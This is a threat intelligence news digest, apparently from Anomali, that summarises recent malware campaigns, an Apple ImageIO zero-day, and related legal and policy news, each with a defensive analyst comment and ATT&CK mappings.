Anomali Cyber Watch: Noodlophile Stealer, GodRAT, Apple ImageIO Zero-Day, and More
Noodlophile Stealer Uses Copyright Lures, Dropbox Links, and DLL Sideloading to Hit Enterprises
(published: August 18, 2025)
Attackers are distributing the Noodlophile infostealer via spear-phishing emails that impersonate law firms and threaten copyright or IP action, often sent from Gmail and tailored with targets’ Facebook Page IDs and ownership details. Victims are pushed to a “PDF” that is actually a ZIP or MSI hosted on Dropbox, which abuses signed apps for DLL sideloading. The chain uses Telegram group descriptions as a dead‑drop to a paste[.]rs payload, sets persistence, and steals browser data and system info. Earlier waves used fake AI tool lures.
Analyst Comment: The emails in this campaign include Facebook Page IDs and ownership details, showing the attackers took time to research their targets. That personalization makes the lure more convincing and harder to dismiss as generic spam. It is a good reminder that even basic public information can be weaponized to strengthen phishing attempts. This is also a moment to refresh phishing prevention training, ensuring staff know how to question messages that seem credible on the surface. Pairing that awareness with filtering of suspicious attachments and monitoring of downloads adds an extra layer of defense.
MITRE ATT&CK: T1598 - Phishing For Information | T1566.002 - Phishing: Spearphishing Link | T1574.002 - Hijack Execution Flow: Dll Side-Loading | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1555.003 - Credentials from Password Stores: Credentials From Web Browsers | T1102 - Web Service | T1071.001 - Application Layer Protocol: Web Protocols | T1070.004 - Indicator Removal on Host: File Deletion
USB Malware Campaign Spreads Cryptominer
(published: August 18, 2025)
A new campaign is distributing a Windows cryptominer through infected USB drives. The attack follows a multi-stage chain that combines DLL hijacking techniques with PowerShell execution to deliver the payload. Telemetry links the malware to Zephyr and XMRig variants, with infections reported in the US, several European nations, Egypt, India, Kenya, Indonesia, Thailand, Vietnam, Malaysia, and Australia.
Analyst Comment: USBs often get overlooked, but they still remain one of the easiest ways for malware to move around. An infected stick doesn’t need to be clever to cause problems, and in this case it was enough to drop a script and sideload a DLL to get a miner running. It’s a good reminder that basic USB hygiene matters. Scanning removable media, disabling auto-run, and keeping an eye on odd process paths are simple steps that prevent something this basic from taking hold.
MITRE ATT&CK: T1091 - Replication Through Removable Media | T1204.002 - User Execution: Malicious File | T1059.001 - Command and Scripting Interpreter: Powershell | T1218 - Signed Binary Proxy Execution | T1105 - Ingress Tool Transfer
GodRAT Campaign Targets Financial Firms With Steganography and Dual Implants
(published: August 19, 2025)
Kaspersky reports a Gh0st RAT‑based malware dubbed GodRAT hitting trading and brokerage firms since September 2024. Initial delivery used malicious .scr screensaver files over Skype, later expanding to .pif lures that masquerade as financial documents. The loaders hide shellcode in images using steganography, fetch GodRAT from a C2 server, and in some cases abuse an expired “Valve.exe” plus “SDL2.dll” for DLL side‑loading and persistence via the Run key. Once installed, operators used a FileManager plugin and deployed Chrome and Edge password stealers. AsyncRAT was also dropped as a parallel foothold and patches AMSI and ETW to evade scanning. Activity continues through August 12, 2025, with targeting observed in the UAE, Hong Kong, Jordan, Lebanon, and Malaysia. The toolset resembles AwesomePuppet, suggesting an evolution likely tied to the Chinese treat group Winnti.
Analyst Comment: The pairing of GodRAT and AsyncRAT shows a layered approach to persistence, with each tool covering the other’s weaknesses and providing redundancy if one is caught. It is a reminder that removing one threat does not guarantee cleanup, and defenders should always check for additional implants that may still be active.
MITRE ATT&CK: T1566.003 - Phishing: Spearphishing Via Service | T1204.002 - User Execution: Malicious File | T1059.003 - Command and Scripting Interpreter: Windows Command Shell | T1055 - Process Injection | T1620 - Reflective Code Loading | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1574.002 - Hijack Execution Flow: Dll Side-Loading | T1027.003 - Obfuscated Files or Information: Steganography | T1027.002 - Obfuscated Files or Information: Software Packing | T1027.009 - Obfuscated Files or Information: Embedded Payloads | T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File | T1036.005 - Masquerading: Match Legitimate Name Or Location | T1036.007 - Masquerading: Double File Extension | T1562.001 - Impair Defenses: Disable Or Modify Tools | T1082 - System Information Discovery | T1518.001 - Software Discovery: Security Software Discovery | T1083 - File And Directory Discovery | T1555.003 - Credentials from Password Stores: Credentials From Web Browsers | T1105 - Ingress Tool Transfer | T1095 - Non-Application Layer Protocol
Europe’s Ransomware Surge Is a Warning Shot for US Defenders
(published: August 20, 2025)
OpenText’s 2025 Cybersecurity Threat Report shows ransomware infection rates in Europe are three to four times higher than in the US, alongside a 28.5% rise in malware on business PCs. Researchers warn this pattern has played out before as ransomware tactics are often refined abroad before being deployed against US organizations. The current wave, tied to pro-Russian hacktivists and RaaS affiliates, is striking European infrastructure, airports, media, and government. Europe’s spike should be seen as an advance signal, not an isolated problem.
Analyst Comment: While the current wave has been tied to the Russia-Ukraine war, the conflict has become a proving ground for adversarial TTPs and malware. Infection chains, extortion methods, and ransomware tooling are being battle-tested against European infrastructure under real conditions. It is not hard to imagine those same methods, now tested and refined, being deployed against the US. What looks like a regional spike today should be used as an early warning sign for US defenders.
MITRE ATT&CK: T1595.002 - Active Scanning: Vulnerability Scanning | T1190 - Exploit Public-Facing Application | T1133 - External Remote Services | T1199 - Trusted Relationship | T1078 - Valid Accounts | T1567 - Exfiltration Over Web Service | T1486 - Data Encrypted For Impact | T1498 - Network Denial Of Service | T1657 - Financial Theft
XenoRAT Espionage Campaign Targets Embassies in South Korea
(published: August 18, 2025)
A state-sponsored operation has targeted mostly European embassies in Seoul since March, conducting at least 19 spearphishing waves to deploy the open‑source XenoRAT malware. Lures impersonated diplomats, were multilingual, and were timed to real events. Delivery relied on password‑protected ZIP files hosted on Dropbox, Google Drive, or Daum. Inside, a PDF‑themed shortcut launched PowerShell that fetched XenoRAT from GitHub and set persistence with scheduled tasks. XenoRAT supports keylogging, screenshots, webcam and microphone access, file transfer, and remote shell, and it is obfuscated and memory loaded for stealth.
Analyst Comment: While XenoRAT is most certainly a threat, I want to highlight why the campaign was effective in the first place: social engineering. The attackers relied on tactics that seem obvious in hindsight, like trusted platforms and multilingual diplomatic themes to make the lures feel natural, but also on subtler tricks such as password-protected attachments. Entering a password creates a sense of security, especially in the context of sensitive diplomatic material, reinforcing the illusion of confidentiality. Yet anyone security-minded knows that sending the password in the same email removes any real protection. It simply ensures the victim can open the file while scanners cannot. Spotting these small cues is often the difference between catching and falling for a phishing attempt.
MITRE ATT&CK: T1059.003 - Command and Scripting Interpreter: Windows Command Shell | T1204.001 - User Execution: Malicious Link | T1053.005 - Scheduled Task/Job: Scheduled Task | T1622 - Debugger Evasion | T1497 - Virtualization/Sandbox Evasion | T1055 - Process Injection | T1071.001 - Application Layer Protocol: Web Protocols
Fake Mac “Fixes” Push New Shamos macOS Infostealer
(published: August 24, 2025)
A new macOS information stealer named Shamos is being delivered through ClickFix pages that impersonate troubleshooting guides and GitHub repositories. The malware is linked by CrowdStrike to the e-crime group COOKIE SPIDER and is described as a variant of Atomic macOS Stealer. Victims are funneled via malvertising or spoofed sites such as mac-safer[.]com and rescue-mac[.]com and instructed to paste a single Terminal command that decodes a URL, downloads a Bash script, captures the user password, removes quarantine attributes, and executes a Mach-O payload that bypasses Gatekeeper. Shamos searches browsers, Keychain, Apple Notes, and crypto wallets, packages data into out.zip, and exfiltrates it with curl. With sudo rights it creates a LaunchDaemons plist for persistence and can pull additional payloads. CrowdStrike reports attempts against more than 300 environments since June 2025.
Analyst Comment: This may resonate with anyone who in their less cyber-aware days tinkered with IT, hit a roadblock, and leaned on the perceived authority of internet “gurus” for quick fixes. Copying a command from GitHub or a forum straight into Terminal without questioning it, is an easy habit to fall into, and that is precisely what attackers exploit. In this case the command is a simple base64 string concealing the real instructions, something that to a typical user may look like an ordinary troubleshooting code. The best defense is to encourage users to question unfamiliar commands, reinforce that with logging and alerts for encoded one-liners, and provide trusted support paths so people do not feel forced to gamble on fixes from unverified sources.
MITRE ATT&CK: T1583.008 - Acquire Infrastructure: Malvertising | T1204.004 - User Execution: Malicious Copy and Paste | T1059.004 - Command and Scripting Interpreter: Unix Shell | T1059.002 - Command and Scripting Interpreter: Applescript | T1548.003 - Abuse Elevation Control Mechanism: Sudo And Sudo Caching | T1543.004 - Create or Modify System Process: Launch Daemon | T1027.010 - Obfuscated Files or Information: Command Obfuscation | T1553.001 - Subvert Trust Controls: Gatekeeper Bypass | T1497 - Virtualization/Sandbox Evasion | T1555.001 - Credentials from Password Stores: Keychain | T1555.003 - Credentials from Password Stores: Credentials From Web Browsers | T1082 - System Information Discovery | T1005 - Data From Local System | T1560.001 - Archive Collected Data: Archive Via Utility | T1074.001 - Data Staged: Local Data Staging | T1105 - Ingress Tool Transfer | T1041 - Exfiltration Over C2 Channel
Scattered Spider Member Receives 10-Year Prison Term
(published: August 21, 2025)
A U.S. federal judge sentenced Noah Michael Urban, 20, linked to the Scattered Spider collective, to 10 years in prison after his April 4 guilty plea to conspiracy to commit wire fraud, wire fraud, and aggravated identity theft. He was ordered to forfeit about $4.8 million and pay $13 million in restitution. Court filings detail SIM swap attacks between August 2022 and March 2023 that targeted at least 59 victims, alongside phishing of company employees to steal credentials and data used to raid crypto accounts.
Analyst Comment: It’s good to see justice catch up with the attackers we defend against. Scattered Spider has caused real harm, yet with nearly ten members now arrested across the US and UK, it’s clear they are not untouchable. For defenders, it’s a strong reminder that the work you do helps build the evidence that makes these prosecutions possible. The process may be slow, but each sentence handed down shows that persistence pays off. Remember, every defender really does make a difference, thank you.
Malicious RAR Filenames Trigger Fileless VShell Backdoor on Linux
(published: August 22, 2025)
Researchers describe a Linux phishing chain that embeds Base64-encoded Bash in a RAR filename. Execution happens only when an unsafe script expands the name, launching a downloader that fetches an architecture-matched ELF loader and decrypts the VShell backdoor directly in memory. Operators then mask user-space processes with kernel-like names such as kworker/0:2 to reduce scrutiny. Traditional antivirus often misses this because engines focus on file content rather than filenames. The lure observed was a beauty-survey email with a “yy.rar” attachment. VShell is open source and has been used by China-linked UNC5174.
Analyst Comment: I had not come across embedding Base64 Bash in a RAR filename, which makes this worth flagging for awareness. The real target is not the user who opens the archive but the automation that later feeds that name to a shell. That explains the quiet delivery and the jump straight to an in-memory VShell.
MITRE ATT&CK: T1566.001 - Phishing: Spearphishing Attachment | T1059.004 - Command and Scripting Interpreter: Unix Shell | T1082 - System Information Discovery | T1027.010 - Obfuscated Files or Information: Command Obfuscation | T1140 - Deobfuscate/Decode Files Or Information | T1036.005 - Masquerading: Match Legitimate Name Or Location | T1620 - Reflective Code Loading | T1105 - Ingress Tool Transfer | T1071.001 - Application Layer Protocol: Web Protocols
Apple Fixes ImageIO Zero-Day Possibly Exploited in Targeted Attacks
(published: August 22, 2025)
Apple has issued emergency updates for iOS, iPadOS, and macOS to patch CVE-2025-43300, an ImageIO out-of-bounds write that could allow code execution when processing a malicious image. In an August 20 advisory, Apple said it was aware of a report that the flaw may have been exploited in an “extremely sophisticated” attack against specific targeted individuals. Updates were released for iOS 18.6.2, iPadOS 18.6.2 and 17.7.10, and macOS Sequoia 15.6.1, Sonoma 14.7.8, and Ventura 13.7.8. The CVE, which carries a CVSS score of 8.8, was added to CISA’s Known Exploited Vulnerabilities catalog on August 21. Security teams are strongly advised to update affected devices without delay.
Analyst Comment: As a researcher I am coming across zero-click exploits more often, and this case shows why they are a favored choice for advanced operators. Apple’s advisory suggests exploitation was highly targeted, but once details are out, attackers may look for unpatched systems. A friendly reminder: update your Apple devices as soon as possible.
MITRE ATT&CK: T1203 - Exploitation For Client Execution
UK Drops Apple Encryption Backdoor Order After U.S. Pushback
(published: August 19, 2025)
The UK has withdrawn a Technical Capability Notice under the Investigatory Powers Act that would have required Apple to provide access to encrypted iCloud data. Apple had disabled its Advanced Data Protection feature for UK users in February after receiving the order. The move followed pressure from the U.S. government and criticism from privacy advocates. Apple is challenging the legality of the original notice before the Investigatory Powers Tribunal, which has already rejected a Home Office attempt to keep the case confidential. It remains unclear whether Apple will reinstate Advanced Data Protection in the UK.
Analyst Comment: The problem with a master key is simple. Once it exists, the entire system is weaker because attackers may eventually find a way to use it. There is understandable relief that the UK has dropped its demand, but the matter is not settled. Apple has not confirmed whether Advanced Data Protection will return for UK users, and without it, iCloud data such as backups and photos remain under Apple’s keys. That arrangement allows access when required by law but leaves users without the full control that ADP was designed to provide.
Discover More About Anomali
Get the latest news about cybersecurity, threat intelligence, and Anomali's Security and IT Operations platform.
Propel your mission with amplified visibility, analytics, and AI.
Learn how Anomali can help you cost-effectively improve your security posture.
